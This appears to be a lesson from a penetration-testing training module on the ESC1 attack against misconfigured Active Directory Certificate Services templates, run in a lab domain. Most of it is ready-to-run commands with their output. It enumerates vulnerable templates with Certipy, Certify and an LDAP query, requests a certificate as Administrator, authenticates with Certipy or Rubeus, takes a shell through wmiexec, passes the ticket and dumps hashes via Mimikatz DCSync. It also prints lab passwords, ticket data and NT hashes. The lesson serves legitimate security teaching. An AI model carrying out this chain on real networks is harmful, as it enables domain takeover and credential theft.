ESC1
ESC1 (Escalation 1) is the first of the domain escalation scenarios; it belongs to a group of escalation scenarios that abuse misconfigured AD CS certificate templates.
Understanding ESC1
The primary misconfiguration behind this domain escalation scenario lies in the possibility of specifying an alternate user in the certificate request. This means that if a certificate template allows including a subjectAltName (SAN) different from the user making the certificate request (CSR), it would allow us to request a certificate as any user in the domain.
Suppose that we compromise the domain account BlWasp, we can leverage it to enumerate the CA's certificate templates, hunting for ones that allow the inclusion of alternate names (SAN). If such templates exist, we can request a certificate using the compromised BlWasp account's credentials, incorporating the desired alternate account (e.g., Administrator) in the SAN field. Upon successfully issuing the certificate, the ADCS server sends the certificate back to us, allowing us to use this certificate to authenticate as the specified account in the SAN; this could allow unauthorized access and privilege escalation by authenticating as a higher-privileged user using the acquired certificate as credentials.
Note: While most examples within this module have the ADCS service residing on a domain controller, know that it can be deployed on a server other than the DC.
ESC1 Abuse Requirements
To abuse ESC1 the following conditions must be met:
- The Enterprise CA grants enrollment rights to low-privileged users.
- Manager approval should be turned off (social engineering tactics can bypass these security measures).
- No authorized signatures are required.
- The security descriptor of the certificate template must be excessively permissive, allowing low-privileged users to enroll for certificates.
- The certificate template defines EKUs that enable authentication.
- The certificate template allows requesters to specify a
subjectAltName (SAN)in theCSR.
ESC1 Enumeration and Attack
We will discuss how to enumerate and abuse ESC1 from Linux and Windows.
ESC1 Enumeration from Linux
To begin with, we can identify AD CS vulnerabilities using certipy with the options find and -vulnerable. Let's use the account blwasp@lab.local and Password123! password. The options we will use are the following:
- Username:
-u / -username <Username> - Password:
-p / -password <Password> - IP address Domain Controller:
-dc-ip <IP> - Find Vulnerable configuration:
-vulnerable - Output result as text to stdout:
-stdout(if this option is not present, the output will be saved as .txt, .json, and BloodHound data)
Note: We will discuss BloodHound usage later in this module.
Finding Vulnerabilities in ADCS
$ certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 40 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Trying to get CA configuration for 'lab-LAB-DC-CA' via CSRA
[*] Got CA configuration for 'lab-LAB-DC-CA'
[*] Enumeration output:
<SNIP>
Certificate Templates
4
Template Name : ESC1
Display Name : ESC1
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
Write Property Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
LAB.LOCAL\Administrator
[!] Vulnerabilities
ESC1 : 'LAB.LOCAL\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
Note: The above command contains a portion of the Certipy text output, specifically focusing on a template vulnerable to ESC1. Please note that the complete output likely includes other templates and Certificate Authorities vulnerabilities that we will discuss later.
In the above output, the Template ESC1 is vulnerable to ESC1. We can confirm this by looking at the output section [!] Vulnerabilities. To confirm this information, we can also identify the conditions that make this template vulnerable to ESC1:
- Enrollment Rights:
LAB.LOCAL\Domain Users. - Requires Manager Approval:
False. - Authorized Signature Required:
0. - Client Authentication:
Trueor Extended Key UsageClient Authentication. - Enrollee Supplies Subject:
True.
Note: Keep in mind that we may find a template vulnerable where the Enrollment Rights doesn't include Domain Users but it may contain another group that we have an account with access to enroll.
ESC1 Abuse from Linux
To abuse the ESC1 vulnerable template, we must use certipy to request a Certificate and include the alternate subject. We can do this using the option req to request a certificate and the option -upn Administrator to specify we want to include an alternative subject (in this case, the Administrator):
Certificate Request with alternative SAN
$ certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.205.199 -ca lab-LAB-DC-CA -template ESC1 -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 58
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
The above commands create a certificate file named administrator.pfx, we can use that certificate to authenticate as the Administrator:
Note: If we get an error: The NETBIOS connection with the remote host timed out, just try again.
Certificate Authentication
$ certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip 10.129.205.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@lab.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:<SNIP>
To authenticate, we can use the TGT saved in administrator.ccache. Additionally, certipy also retrieves the NT hash of the account Administrator using the information in the certificate request. Let's use the TGT to execute WMIexec:
Use TGT to connect to the DC
$ KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
lab\administrator
Note: To use Kerberos and generate a TGT, we need to be able to make a domain name resolution. We can configure our DNS to point to the domain or put the domain name in the /etc/hosts file.
ESC1 Enumeration from Windows
When attacking from Windows, we typically have access to a computer member of the domain, and from there, we will proceed with the attack. For this example, we will connect to the domain controller, and from there, we will perform the attacks. Let's connect to the domain controller using blwasp credentials:
Connect via RDP
$ xfreerdp /u:blwasp /p:'Password123!' /d:lab.local /v:10.129.228.236 /dynamic-resolution
[19:18:25:549] [948409:948410] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[19:18:25:549] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[19:18:25:550] [948409:948410] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
...SNIP...
We can identify AD CS vulnerabilities using Certify.exe with the options find and /vulnerable. Unlike the Python version, from Windows, we do not need to enter credentials because the program takes them from the running session. Therefore, we must consider the context from which we run the application.
Enumerate ADCS with Certify.exe
PS C:\Tools> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Listing info about the Enterprise CA 'lab-LAB-DC-CA'
Enterprise CA Name : lab-LAB-DC-CA
DNS Hostname : LAB-DC.lab.local
FullName : LAB-DC.lab.local\lab-LAB-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=lab-LAB-DC-CA, DC=lab, DC=local
Cert Thumbprint : CF54249CAEFB0E092265BFD306940DCBABA4C9A6
Cert Serial : 16BD1CE8853DB8B5488A16757CA7C101
Cert Start Date : 26/03/2022 01:07:46
Cert End Date : 26/03/2027 01:17:46
Cert Chain : CN=lab-LAB-DC-CA,DC=lab,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
Allow ManageCA, ManageCertificates LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Allow ManageCA, Enroll LAB\blwasp S-1-5-21-2570265163-3918697770-3667495639-1103
Allow ManageCA, Enroll LAB\user_manageCA S-1-5-21-2570265163-3918697770-3667495639-1194
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : LAB-DC.lab.local\lab-LAB-DC-CA
Template Name : ESC1
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519\
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
WriteOwner Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteDacl Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
WriteProperty Principals : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
<SNIP>
Additionally, we can use PowerShell to list the certificates that meet the conditions we need to be vulnerable to ESC1:
PowerShell ADCS Enumeration
PS C:\Tools> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=OfflineRouter,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local OfflineRouter pKICertificateTemplate f1f9e21c-f31c-4d4e-85de-4682867c4d82
CN=ESC1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local ESC1 pKICertificateTemplate 210ae26a-2668-413c-aad8-983ea2a5434a
The above command queries Active Directory for certificate templates. Let's break down the command and its output:
- The
Get-ADObjectcmdlet is used to query AD objects. It uses the-LDAPFilterparameter to specify an LDAP filter for the query. - The LDAP filter is used to filter certificate templates. Here's a breakdown of the filter:
(&(objectclass=pkicertificatetemplate)- This part of the filter specifies that you are looking for objects with thepkicertificatetemplateclass, which represents certificate templates.(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))- This part excludes objects where themspki-enrollment-flagattribute has a value of 2.(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))- This part checks whether themspki-ra-signatureattribute is either 0 or empty.(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4))- This part checks for specific extended key usages.(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))- This part checks whether the "mspki-certificate-name-flag" attribute has a value of 1. The-SearchBaseparameter specifies the search base for the query. In this case, it's set toCN=Configuration,DC=lab,DC=local, which is the location in the Active Directory hierarchy where the query is performed.
ESC1 Attack from Windows
To abuse this certificate, we need to include an alternative SAN in our request, and we need to use the option request to request a certificate and the parameters /ca:<CA NAME> to specify the ADCS server, /template:<Template Name> to set the template we want to abuse and /altname:<Account to Impersonate> to specify the account we want to include an alternative subject:
Certificate Request with alternative SAN
PS C:\Tools> .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:ESC1 /altname:administrator@lab.local
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : LAB\grace
[*] No subject name specified, using current context as subject.
[*] Template : ESC1
[*] Subject : CN=Grace Start, CN=Users, DC=lab, DC=local
[*] AltName : administrator@lab.local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 58
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAsrll8PDAN0okTiQRzYX1lsbU5D9nazZX4O0lAehrddfPZbJH
8gI37syxrjmlgYOwumXOeHf5Q1o9iQgfXDg0/60uS2+P6ZzbPmSrYLpaE5ougrPw
RvswDeeEMYfrDElQ3TLno1qvpQkce1iawndc+pM/AmMbpJvg7YEy1BJN2z8nYVkV
6TQq3ggMVKIcuIJeOlHX+wV47n/xhFmDqHTd6+VNsn01g2kyR6tsUyhh/JfjrPoU
2o2It9gtcyb0dHeJQPPTsOk/9b9r96ncHw4dNNhWNcd66OHPR9cAgqBO7M7lMjKp
B2pW6cXaf4b6J84IYpDovVwvh4mE+yqk0FMDJQIDAQABAoIBAAYXn8v4yPSZiGdJ
...SNIP...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGHzCCBQegAwIBAgITSQAAADonzL0qqiTGLAAAAAAAOjANBgkqhkiG9w0BAQsF
ADBEMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZFgNsYWIx
FjAUBgNVBAMTDWxhYi1MQUItREMtQ0EwHhcNMjMxMTE4MTEwMDM5WhcNMjcwMzI2
MDAxNzQ2WjBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxEzARBgoJkiaJk/IsZAEZ
FgNsYWIxDjAMBgNVBAMTBVVzZXJzMRQwEgYDVQQDEwtHcmFjZSBTdGFydDCCASIw
...SNIP...
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:04.1419031
Next, we must use OpenSSL and convert the certificate to pfx format. We must copy the cert.pem output from the above command and save it to our Linux machine or use OpenSSL on Windows if installed. We need to use the command at the end of the Certify.exe output. We use that command and leave the password prompt empty:
Convert Certificate
PS C:\Tools> & "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
Now, we can authenticate using Rubeus and the certificate we generated. We will use the parameter asktgt followed by the option /user:Administrator, which is the user we added the alternative SAN, the certificate file with the option /certificate:cert.pfx, /getcredentials to retrieve the NT hash based on the certificate just as certipy does and /nowrap to copy the content of the base64 ticket easily:
Certificate Authentication
PS C:\Tools> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Grace Start, CN=Users, DC=lab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'lab.local\administrator'
[*] Using domain controller: fe80::42d5:b682:fe30:8453%18:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFWzCCBVdhggVTMIIFT6ADAgEFoQsbCUxBQi5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJbGFiLmxvY2Fso4IFGTCCBRWgAwIBEqEDAgECooIFBwSCBQPklcRxC5etXvE/FYJFt2cTmoJFOt5fdXK/9u2QmPDoLhCLnNYErBeM1tkqlO/C56kQjS2+7mlZ1257GWFKVqNuggIA7OQj7Bsf2NYjjWKl7uOPtnBjqwN1cTMdJWwhpaAq9g//udgUerJgshSgNsa3dQQkoHq6SqnOG9DgTHIWh6qF/E0lvG7KQl7muTnyzrpmIvZGzfgEvwT/F1nRGvCFiBRsq22wBvtxpEbTeWGJ7jzkSwxCqsaZr8N4GN7NHNKaNwnj2TVqSVYWmriW2GA8mYxS7IXKT9TJ8hBS0kNA+qIos1Che352DUJNSXRh4eQS3ny+cpOmfLPrcEEDf6kQMWFxchApGQ/kZnrO6/
...SNIP...
ServiceName : krbtgt/lab.local
ServiceRealm : LAB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : LAB.LOCAL
StartTime : 18/11/2023 12:44:27
EndTime : 18/11/2023 22:44:27
RenewTill : 25/11/2023 12:44:27
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : sE3TSQyeA2X1SBjGpFDQjw==
ASREP (key) : 79B5CEFC05639C2C44F668D65DBC9CD4
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 2B576ACBE6BCFDA7294D6BD18041B8FE
Now we have two options to use the output provided by Rubeus: we can use the NT Hash with any of our preferred tools or use the TGT base64(ticket.kirbi) to get a session as the Administrator. Let's use the ticket with Rubeus.
One of the different methods we can use is to create a sacrificial logon session using the Rubeus option createnetonly:
Create a Sacrificial Logon Session with Rubeus
PS C:\Tools> .\Rubeus.exe createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : RWIAKJRE
[*] Domain : 51H9LPO9
[*] Password : W8F3NI1K
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 8
[+] LUID : 0x5c1d7f
When we specify the option /show, it will display the process we executed. In this case, we run powershell.exe. In the new PowerShell windows that we just launched using Rubeus, we need to use Rubeus ptt with the option /ticket:<BASE64 output> to perform a Pass the Ticket attack:
Import Base64 Ticket into the PowerShell session using Rubeus
PS C:\Tools> .\Rubeus.exe ptt /ticket:doIGQjCCBj6gAwIBBaEDAgEW<SNIP>
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
[*] Action: Import Ticket
[+] Ticket successfully imported!
Now, this PowerShell process has the Administrator's TGT, meaning that we can use the privileges that the Administrator has. Let's use Mimikatz to perform a DCSync attack as an example:
Use Mimikatz to Perform a DCSync Attack
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"'
Hostname: LAB-DC.lab.local / S-1-5-21-2570265163-3918697770-3667495639
.#####. mimikatz 2.2.0 (x64) #19041 Jan 29 2023 07:49:10
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /user:lab\Administrator
[DC] 'lab.local' will be the domain
[DC] 'LAB-DC.lab.local' will be the DC server
[DC] 'lab\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 06/04/2022 18:42:27
Object Security ID : S-1-5-21-2570265163-3918697770-3667495639-500
Object Relative ID : 500
Credentials:
Hash NTLM: 2b576acbe6bcfda7294d6bd18041b8fe
ntlm- 0: 2b576acbe6bcfda7294d6bd18041b8fe
ntlm- 1: c7fc699065bf5158f23527e5f2b53f43
lm - 0: 26f4d26f6e423d829697f6d9d1f72bd2